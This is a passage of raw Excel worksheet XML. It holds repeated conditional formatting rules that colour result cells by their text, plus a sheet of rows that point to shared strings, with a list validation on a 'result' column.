          <x14:cfRule type="containsText" priority="21" operator="containsText" id="{130A15E3-19C6-47CD-BB5E-13C4BEC486AE}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E58)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="22" operator="containsText" id="{70A20BEA-2B0E-41E1-A306-4B2D1DD5DF51}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E58)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="23" operator="containsText" id="{F79410BE-9C6D-4EDC-8832-5A041D1646A4}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E58)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="24" operator="containsText" id="{96275FE6-3E86-442D-B358-0C4BC2DF57AA}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E58)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E58:E65</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="17" operator="containsText" id="{9D5C0607-822D-4AF0-BD4D-EABCFB1FD27F}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E68)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="18" operator="containsText" id="{B5700AE9-54DA-411B-A972-F47F8413F9B7}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E68)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="19" operator="containsText" id="{70A80180-D5D3-456C-AFA8-53C3D04AD5C0}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E68)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="20" operator="containsText" id="{A68492DD-304D-4530-AFEF-39DC005EDBF9}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E68)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E68:E97</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="13" operator="containsText" id="{1343D2C0-82D2-43B9-A669-A21475ECFA38}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E100)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="14" operator="containsText" id="{EDF626A8-3A59-4562-BFB6-4A7E4965CFDF}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E100)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="15" operator="containsText" id="{1E6437CE-C472-4467-98C3-864401F1F405}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E100)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="16" operator="containsText" id="{BA0D4596-D40F-4E78-AB79-39FFCA8190C8}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E100)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E100:E101</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="9" operator="containsText" id="{62D63AA4-AA53-49A1-B18F-2715607D1319}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E104)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="10" operator="containsText" id="{51D4FCEF-BBEC-4536-A61A-153FECDD20DF}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E104)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="11" operator="containsText" id="{CA83D17B-9A1C-4283-9002-4DB619755AFB}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E104)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="12" operator="containsText" id="{0AEC5701-F7D2-4CF1-8880-D55930B0D8F8}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E104)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E104:E107</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="5" operator="containsText" id="{3F30910A-E727-4CEE-98B4-DC67B581E6AC}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E110)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="6" operator="containsText" id="{CCCD2B4C-84D3-4981-9935-7DCE80E94407}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E110)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="7" operator="containsText" id="{24963157-98FD-476D-A00A-1A0077CE7F9F}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E110)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="8" operator="containsText" id="{322F5925-E3C7-4CB7-AC77-2AA3E5DE8445}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E110)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E110:E118</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="1" operator="containsText" id="{F48C1E77-A8D5-439A-81D7-5B5A2C72BF08}">
            <xm:f>NOT(ISERROR(SEARCH($A$146,E121)))</xm:f>
            <xm:f>$A$146</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{A25A0166-2FD2-4BFA-B830-BB89743B6B55}">
            <xm:f>NOT(ISERROR(SEARCH($A$145,E121)))</xm:f>
            <xm:f>$A$145</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{1C7583C6-CBA9-471D-94D9-423D9BF6DFDF}">
            <xm:f>NOT(ISERROR(SEARCH($A$144,E121)))</xm:f>
            <xm:f>$A$144</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{BC5FF2C1-DAA6-4C67-A17E-75DE606138AE}">
            <xm:f>NOT(ISERROR(SEARCH($A$143,E121)))</xm:f>
            <xm:f>$A$143</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E121:E137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BFA60-8BA5-4835-9720-1385E8F03E44}">
  <dimension ref="A1:F28"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="28.109375" customWidth="1"/>
    <col min="2" max="2" width="46.44140625" customWidth="1"/>
    <col min="3" max="3" width="62.77734375" customWidth="1"/>
    <col min="4" max="4" width="49.77734375" customWidth="1"/>
    <col min="5" max="5" width="24" customWidth="1"/>
    <col min="6" max="6" width="22.77734375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="20" t="s">
        <v>407</v>
      </c>
      <c r="B1" s="21"/>
    </row>
    <row r="2" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A2" s="21"/>
      <c r="B2" s="21"/>
    </row>
    <row r="3" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3"/>
    <row r="4" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3"/>
    <row r="5" spans="1:6" s="3" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:6" s="16" customFormat="1" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A6" s="3" t="s">
        <v>408</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>410</v>
      </c>
      <c r="C6" s="5" t="s">
        <v>411</v>
      </c>
      <c r="D6" s="6" t="s">
        <v>312</v>
      </c>
      <c r="E6" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="7" spans="1:6" s="16" customFormat="1" ht="33" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="3" t="s">
        <v>409</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>412</v>
      </c>
      <c r="C7" s="8" t="s">
        <v>413</v>
      </c>
      <c r="D7" s="6" t="s">
        <v>313</v>
      </c>
      <c r="E7" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A8" s="3"/>
      <c r="B8" s="4"/>
      <c r="C8" s="8"/>
      <c r="D8" s="6"/>
      <c r="E8" s="10"/>
    </row>
    <row r="9" spans="1:6" s="16" customFormat="1" ht="51" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="1" t="s">
        <v>40</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:6" s="16" customFormat="1" ht="35.4" x14ac:dyDescent="0.3">
      <c r="A10" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>42</v>
      </c>
      <c r="C10" s="8" t="s">
        <v>316</v>
      </c>
      <c r="D10" s="6" t="s">
        <v>317</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="11" spans="1:6" s="16" customFormat="1" ht="24" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="4" t="s">
        <v>415</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>416</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>417</v>
      </c>
      <c r="D11" s="18" t="s">
        <v>418</v>
      </c>
      <c r="E11" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="12" spans="1:6" s="16" customFormat="1" ht="33.6" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="3"/>
      <c r="B12" s="4"/>
      <c r="C12" s="8"/>
      <c r="D12" s="6"/>
      <c r="E12" s="10"/>
    </row>
    <row r="13" spans="1:6" s="16" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A13" s="1" t="s">
        <v>451</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="14" spans="1:6" s="16" customFormat="1" ht="46.8" x14ac:dyDescent="0.3">
      <c r="A14" s="3" t="s">
        <v>419</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>430</v>
      </c>
      <c r="C14" s="8" t="s">
        <v>420</v>
      </c>
      <c r="D14" s="6" t="s">
        <v>421</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="15" spans="1:6" s="16" customFormat="1" ht="24" x14ac:dyDescent="0.3">
      <c r="A15" s="3" t="s">
        <v>422</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>423</v>
      </c>
      <c r="C15" s="8" t="s">
        <v>424</v>
      </c>
      <c r="D15" s="6" t="s">
        <v>425</v>
      </c>
      <c r="E15" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="16" spans="1:6" s="16" customFormat="1" ht="30" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" s="3" t="s">
        <v>426</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>431</v>
      </c>
      <c r="C16" s="8" t="s">
        <v>427</v>
      </c>
      <c r="D16" s="6" t="s">
        <v>428</v>
      </c>
      <c r="E16" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="17" spans="1:6" s="16" customFormat="1" ht="24" x14ac:dyDescent="0.3">
      <c r="A17" s="4" t="s">
        <v>429</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>432</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>433</v>
      </c>
      <c r="D17" s="18" t="s">
        <v>434</v>
      </c>
      <c r="E17" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="18" spans="1:6" s="16" customFormat="1" ht="27.6" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" s="4" t="s">
        <v>435</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>436</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>437</v>
      </c>
      <c r="D18" s="18" t="s">
        <v>438</v>
      </c>
      <c r="E18" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A19" s="4" t="s">
        <v>439</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>440</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>441</v>
      </c>
      <c r="D19" s="18" t="s">
        <v>442</v>
      </c>
      <c r="E19" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F19" s="16"/>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A20" s="4" t="s">
        <v>443</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>444</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>445</v>
      </c>
      <c r="D20" s="18" t="s">
        <v>446</v>
      </c>
      <c r="E20" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F20" s="16"/>
    </row>
    <row r="21" spans="1:6" ht="24" x14ac:dyDescent="0.3">
      <c r="A21" s="4" t="s">
        <v>447</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>448</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>449</v>
      </c>
      <c r="D21" s="18" t="s">
        <v>450</v>
      </c>
      <c r="E21" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F21" s="16"/>
    </row>
    <row r="23" spans="1:6" s="16" customFormat="1" ht="26.4" x14ac:dyDescent="0.3">
      <c r="A23" s="1" t="s">
        <v>457</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F23" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="24" spans="1:6" s="16" customFormat="1" ht="35.4" x14ac:dyDescent="0.3">
      <c r="A24" s="3" t="s">
        <v>455</v>
      </c>
      <c r="B24" s="4" t="s">
        <v>452</v>
      </c>
      <c r="C24" s="8" t="s">
        <v>453</v>
      </c>
      <c r="D24" s="6" t="s">
        <v>454</v>
      </c>
      <c r="E24" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="25" spans="1:6" s="16" customFormat="1" ht="24" x14ac:dyDescent="0.3">
      <c r="A25" s="3" t="s">
        <v>456</v>
      </c>
      <c r="B25" s="4" t="s">
        <v>458</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>459</v>
      </c>
      <c r="D25" s="6" t="s">
        <v>460</v>
      </c>
      <c r="E25" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="35.4" x14ac:dyDescent="0.3">
      <c r="A26" s="4" t="s">
        <v>461</v>
      </c>
      <c r="B26" s="4" t="s">
        <v>462</v>
      </c>
      <c r="C26" s="8" t="s">
        <v>463</v>
      </c>
      <c r="D26" s="6" t="s">
        <v>460</v>
      </c>
      <c r="E26" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F26" s="16"/>
    </row>
    <row r="27" spans="1:6" ht="24" x14ac:dyDescent="0.3">
      <c r="A27" s="4" t="s">
        <v>464</v>
      </c>
      <c r="B27" s="4" t="s">
        <v>465</v>
      </c>
      <c r="C27" s="8" t="s">
        <v>466</v>
      </c>
      <c r="D27" s="6" t="s">
        <v>467</v>
      </c>
      <c r="E27" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F27" s="16"/>
    </row>
    <row r="28" spans="1:6" ht="35.4" x14ac:dyDescent="0.3">
      <c r="A28" s="4" t="s">
        <v>468</v>
      </c>
      <c r="B28" s="4" t="s">
        <v>469</v>
      </c>
      <c r="C28" s="8" t="s">
        <v>470</v>
      </c>
      <c r="D28" s="6" t="s">
        <v>471</v>
      </c>
      <c r="E28" s="7" t="s">
        <v>9</v>
      </c>
      <c r="F28" s="16"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:B2"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="list" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="result" sqref="E10:E11 E14:E21 E6:E7 E24:E28" xr:uid="{658937A1-5173-48E5-A0C9-B75E1262D158}">
      <formula1>$A$93:$A$96</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" r:id="rId1"/>
  <tableParts count="4">
    <tablePart r:id="rId2"/>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containsText" priority="41" operator="containsText" id="{52902BBC-676C-4586-8F92-D5516A1F04BD}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E6)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="42" operator="containsText" id="{C07203BC-7216-40E0-A677-D57EE2F315D0}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E6)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="43" operator="containsText" id="{1DB829E9-36FC-40B8-809D-AFC75283932F}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E6)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="44" operator="containsText" id="{BDE57AFA-C0B5-4C43-8F9E-4EFAFD764A2E}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E6)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E6:E7 E10:E11 E24</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="33" operator="containsText" id="{496B8FFE-658C-4503-904F-09B48A560C4C}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E14)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="34" operator="containsText" id="{2B788367-7C06-4026-851E-84BCA8D86F24}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E14)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="35" operator="containsText" id="{E7036B01-A617-4C02-BA1B-8E82991EF93A}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E14)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="36" operator="containsText" id="{B250DF04-A6BF-4944-B6FE-06423C34ADD1}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E14)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E14:E21</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="13" operator="containsText" id="{B941470A-2143-415D-B1FC-9B8F9EC5786B}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E24)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="14" operator="containsText" id="{63D46AE7-6649-41F5-8041-20CADD736686}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E24)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="15" operator="containsText" id="{977B4192-A515-4F30-B79A-5C67D2000D9A}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E24)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="16" operator="containsText" id="{7AED9FE7-6B25-4AF1-BCAF-47E0B5638DB3}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E24)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E24:E25</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="9" operator="containsText" id="{29335B5A-09EA-4B56-9AD4-0D0810E8F9B8}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E26)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="10" operator="containsText" id="{468B970E-98F7-4BE3-BC6C-49CF6304DD4F}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E26)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="11" operator="containsText" id="{43852E20-2D37-4E19-909E-90D81B37F88A}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E26)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="12" operator="containsText" id="{A971448B-FDBE-4313-A11D-19F1E3D0B1E0}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E26)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E26</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="5" operator="containsText" id="{53C1A93D-7FF3-42EB-8847-464126D6CAC2}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E27)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="6" operator="containsText" id="{FA8CA369-7F3A-4F64-960A-A2E9031F4386}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E27)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="7" operator="containsText" id="{CAA26369-5468-4B9E-888B-C9ECA253E8BB}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E27)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
